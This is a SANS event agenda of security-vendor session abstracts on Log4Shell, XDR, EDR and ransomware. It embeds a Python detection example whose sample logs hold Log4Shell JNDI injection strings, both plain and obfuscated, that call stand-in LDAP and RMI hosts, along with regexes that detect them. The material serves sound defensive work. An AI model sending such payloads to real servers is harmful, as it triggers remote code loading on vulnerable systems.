Agenda | March 25, 2022 | 10:30 AM - 3:30 PM EDT
Welcome & Opening Remarks
Matthew Bromiley, SANS Instructor & Subject Matter Expert
Cross Data Source Detections – Real World Scenario from the Log4Shell Attack
After the Log4Shell vulnerability was announced, Hunters researched the vulnerability and the relevant exploitation techniques in order to surface servers at potential risk, hunt for exploitation attempts, and develop detection methods that can detect exploitation of Log4Shell. Given that Log4j is used in a wide range of consumer and enterprise websites, services, and applications, we first assessed our own systems and then took measures to identify potential vulnerabilities or attacks for our customers, creating a visibility dashboard and Analytics within the Hunters platform. We will show how Hunters built new detections for Log4Shell, adding an extra layer of protection for the security teams who work with us.
Actionable Takeaways:
• Deeper understanding of how attacks can be missed in SIEM and other environments
• How cross data source detection works to improve detection efficiency
• How this approach worked with Log4Shell detection
• How Hunters built new detections for Log4Shell, adding an extra layer of protection
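The cross data source idea in this abstract can be illustrated with a small detection that joins two sources: a JNDI lookup string in a web request is only an exploitation attempt, while an outbound connection from the same web server to the attacker's callback host shortly afterwards shows the lookup actually fired. The following is an added example written for this agenda, not Hunters' own detection code or platform logic; the log lines, the host name "web-01", the log formats and the 60-second correlation window are all constructed assumptions for illustration.

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

# --- Constructed sample data (hypothetical; not from any real incident or customer) ---
# Source 1: combined-format access log of the assumed web server "web-01".
ACCESS_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /api/health HTTP/1.1" 200 17 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:03:40 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:14:05:02 +0000] "GET /api/health HTTP/1.1" 200 17 "-" "${${lower:j}ndi:${lower:l}d${lower:a}p://198.51.100.7:1389/b}"',
    '203.0.113.12 - - [10/Dec/2021:14:06:30 +0000] "GET /search?q=%24%7Bjndi%3Armi%3A%2F%2F192.0.2.33%3A1099%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]
# Source 2: outbound network events for the same host (firewall / NetFlow / EDR style; constructed format).
OUTBOUND_LOG = [
    "2021-12-10T14:02:12Z web-01 outbound dst=198.51.100.7 dport=1389 proto=tcp",
    "2021-12-10T14:05:03Z web-01 outbound dst=198.51.100.7 dport=1389 proto=tcp",
    "2021-12-10T14:05:04Z web-01 outbound dst=198.51.100.7 dport=8080 proto=tcp",
    "2021-12-10T14:06:45Z web-01 outbound dst=203.0.113.200 dport=443 proto=tcp",
]

ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" \d+ \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
OUTBOUND_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) outbound dst=(?P<dst>\S+) dport=(?P<dport>\d+)")
# Common in-the-wild obfuscations of the lookup string: ${lower:x}, ${upper:x} and the
# default-value trick ${::-x} all resolve to x. Other variants (e.g. ${env:NOPE:-x}) are not handled here.
OBFUSCATION_RE = re.compile(r"\$\{(?:lower|upper):([^}$]*)\}|\$\{::-([^}$]*)\}", re.IGNORECASE)
# Matching is case-insensitive, so the case produced by lower/upper lookups does not matter.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>ldaps?|rmi|dns|iiop|corba|nds|https?)://(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)


def normalize(text: str, max_rounds: int = 5) -> str:
    """URL-decode and strip nested lookup obfuscations until the string stops changing."""
    for _ in range(max_rounds):
        new = unquote(text)
        new = OBFUSCATION_RE.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), new)
        if new == text:
            return new
        text = new
    return text


def find_jndi_attempts(access_log):
    """Source 1 only: every JNDI lookup string in a request line, referer or user agent is an attempt."""
    attempts = []
    for line in access_log:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        for field in ("req", "ref", "ua"):
            for hit in JNDI_RE.finditer(normalize(m[field])):
                attempts.append({
                    "ts": ts, "src": m["src"], "field": field,
                    "scheme": hit["scheme"].lower(), "callback": hit["host"],
                    "port": int(hit["port"]) if hit["port"] else None,
                })
    return attempts


def parse_outbound(outbound_log):
    events = []
    for line in outbound_log:
        m = OUTBOUND_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
            events.append({"ts": ts, "host": m["host"], "dst": m["dst"], "dport": int(m["dport"])})
    return events


def correlate(attempts, outbound, window=timedelta(seconds=60)):
    """Cross-source rule: an attempt followed within `window` by an outbound connection from the
    web server to the callback host means the vulnerable Log4j actually performed the lookup.
    In practice a DNS log would be a third source to map a callback hostname to the IP seen here."""
    findings = []
    for a in attempts:
        matched = [e for e in outbound if e["dst"] == a["callback"] and a["ts"] <= e["ts"] <= a["ts"] + window]
        findings.append({**a, "verdict": "likely_exploited" if matched else "attempt_only",
                         "callbacks_seen": len(matched)})
    return findings


def run_detection():
    return correlate(find_jndi_attempts(ACCESS_LOG), parse_outbound(OUTBOUND_LOG))


if __name__ == "__main__":
    for f in run_detection():
        print(f["ts"].isoformat(), f["src"], f["field"], f["scheme"], f["callback"], f["verdict"], f["callbacks_seen"])
```

On the constructed data the first two requests are flagged as likely exploited because "web-01" reached back to 198.51.100.7 within seconds (the second one twice, including a second-stage fetch on port 8080), while the RMI attempt from 203.0.113.12 stays an attempt only because no matching outbound connection follows it. Looking at the access log alone, all three would look the same, which is the point the session makes about detections that stay inside a single data source.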
XDR: the Blueprint for Solving the Ransomware Challenge
During a ransomware attack, it is critical to detect and respond early and quickly. By decreasing your mean time to detection of the attacker's behavior, your security team can investigate and respond in time to prevent a ransomware incident. To protect against ransomware, it is important to interrupt the kill chain as early as possible. One way to make this radically simple and fast is to harness the power of XDR (Extended Detection and Response).
Join Cisco as we discuss and demonstrate the three key pillars of XDR and the critical role they play in helping you achieve better security outcomes.
Beat the Clock: How to Accelerate Threat Hunting With XDR
To carry out the most efficient threat hunts, defenders need multiple sources of telemetry and a simple way of acquiring and analyzing data from all of them. Join this session to hear the differences between XDR and SIEM-based threat hunts and learn how XDR can reduce the time it takes to detect and respond to potential threats. We'll cover best practices and cautions from real-world experience, as well as preventative measures and investigations that you can start today.
Andrew Mundell, Enterprise Security Engineer, Sophos
Solving for X with XDR: Widening the Aperture for Rapid Detection, Investigation and Response
There has been a lot of buzz around Extended Detection and Response (XDR) as an evolution of Endpoint Detection and Response (EDR); however, definitions vary depending on who you talk to. Dramatic changes to network architectures, as organizations move workloads to the cloud and leverage disparate SaaS tools while still relying on traditional on-premise networks, have increased data volumes and the complexity of detecting threats across these environments.
In this session we will discuss the evolution of security from the endpoint and beyond, from legacy anti-virus, to EDR and now XDR. We will show how detection use cases and workflows that used to require complex and manually configured SIEM and SOAR solutions can be automated and streamlined with XDR, for rapid detection, investigation and response.
Ken Westin, Director of Security Strategy, Cybereason
EDR & XDR – How to Reduce Alerts & Speed Up Investigation
Security teams are overwhelmed, and EDRs are too noisy. With a finite number of hours in the day and a limited amount of resources, it's a daily challenge to validate the vast number of alerts coming into the organization. One source of these alerts is EDR systems, and since EDR is turning into XDR, the number of alerts is only increasing.
Advancements in EDR technology have improved detection rates over the past several years. This is a good thing! But increased detection rates and alerts do not come without their trade-offs.
Any level of manual investigation for every alert coming in from an EDR/XDR system puts a strain on the security organization.
Andrey Voitenko, CISSP, Senior Product Manager, VMRay
Top 3 Endpoint Attacks Ripped from the Headlines
Adversaries keep devising new ways to compromise endpoints. To thwart them, you need the best-in-class endpoint security that's always learning to outpace threats. Attend this session to understand the latest endpoint threats seen and analyzed by the Palo Alto Networks research team.
During this session, we will discuss:
• Recent attacks like Log4Shell and HermeticWiper
Aviad Meyer, Security Research Manager, Palo Alto Networks
Automate Vulnerability Remediation and Reduce EDR Alerts
EDR solutions are tremendously powerful tools and represent the next generation in endpoint security. Come learn how cloud-native IT operations help modern organizations realize outcomes over alerts and avoid the dreaded alert fatigue common with highly sensitive EDR tools today. See how our tool combined with an EDR solution can keep all your endpoints configured and secured, anywhere in the world. With Automox + EDR, SecOps teams can have a recognizable impact on company success and sleep better at night knowing their environment is secure.
Jay Goodman, Director, Product Marketing Group, Automox
Wrap-Up and Closing Remarks
Matt Bromiley, SANS Instructor & Subject Matter Expert